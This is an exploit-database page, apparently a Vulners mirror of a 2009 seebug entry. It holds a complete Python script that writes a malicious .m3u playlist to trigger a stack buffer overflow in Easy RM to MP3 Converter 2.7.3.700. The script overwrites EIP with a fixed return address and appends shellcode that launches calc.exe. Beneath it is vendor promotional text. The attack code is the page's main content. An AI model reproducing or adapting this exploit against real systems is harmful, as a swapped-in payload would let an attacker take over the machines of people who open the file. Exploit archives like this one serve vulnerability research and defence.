Lucene search
K

Easy RM to MP3 Converter 2.7.3.700

🗓️ 10 Dec 2009 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 69 Views

Easy RM to MP3 Converter 2.7.3.700 Buffer Overflow Exploi

Code

                                                import sys

print "\n============================"
print "  Easy RM to MP3 Converter 2.7.3.700 (.m3u) File Buffer Overflow Exploit  "
print "  Tested on Windows XP SP3  "
print "============================\n"
 
# calc.exe - 85 bytes
shellcode =("\x55\x8B\xEC\x33\xC9\x83\xEC\x20\xB8\x4D\x53\x56\x43\x89\x45\xF4\xB8\x52"
    "\x54\x2E\x44\x89\x45\xF8\xB8\x4C\x4C\x4C\x4C\x89\x45\xFC"
    "\x88\x4D\xFE\x8D\x45\xF4\x50\xB8\x77\x1D\x80\x7C\xFF\xD0\xB8\x63\x61"
    "\x6C\x63\x89\x45\xE4\xB8\x2E\x65\x78\x65\x89\x45\xE8\x8D\x45\xE4"
    "\x33\xC9\x88\x4D\xEC\x50\xB8\xC7\x93\xBF\x77\xFF\xD0\x83\xC4\x20\x8B"
        "\xE5\x5D\xC3")
 
buffer1 = "\x41" * 26067
eip = "\x7B\x46\x86\x7C"  
buffer2 = "\x41\x41\x41\x41"

print "[+] Creating malicious .m3u file"
try:
    file = open("exploit.m3u","w")
    file.write(buffer1 + eip + buffer2 + shellcode)
    file.close()
    print "[+] File created"
except:
    print "[x] Could not create file"
 
raw_input("\nPress any key to exit...\n")
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Dec 2009 00:00Current
7.1High risk
Vulners AI Score7.1
69